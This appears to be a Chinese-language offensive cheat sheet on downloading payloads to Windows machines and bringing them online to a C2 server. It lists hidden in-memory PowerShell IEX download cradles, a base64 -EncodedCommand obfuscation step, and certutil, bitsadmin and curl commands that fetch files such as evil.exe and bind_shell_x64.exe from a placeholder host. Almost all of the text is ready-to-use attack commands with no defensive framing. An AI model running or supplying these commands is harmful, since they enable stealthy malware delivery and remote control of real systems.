Windows远程下载文件
windows CMD 下载远程文件,上线C2
# PowerShell
下载到本地
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/evil.txt','evil.exe')
1
通过远程http请求内容,在内存里直接执行
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.1/evil.txt'))"
1
base64编码解决可能存在的转义问题(UTF-16 Little Endian编码),PowerShell 的 -EncodedCommand 要求使用 UTF-16LE 编码再 Base64
$command = "IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.1/evil.txt'))"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)
Write-Output $encoded
1
2
3
4
2
3
4
powershell直接执行base64编码的命令,解决可能存在的转义问题
powershell -nop -w hidden -EncodedCommand <上面输出的base64>
1
# certutil
下载到当前目录
certutil -urlcache -split -f http://192.168.1.1/bind_shell_x64.exe bind_shell_x64.exe
1
# bitsadmin
bitsadmin /transfer jobName /download /priority high http://192.168.1.1/evil.exe evil.exe
1
# curl(win10及以上)
老系统不常见
curl -o bind_shell_x64.exe http://192.168.1.1/bind_shell_x64.exe
1
编辑 (opens new window)
最后一次更新于: 2025/10/04, 14:38:57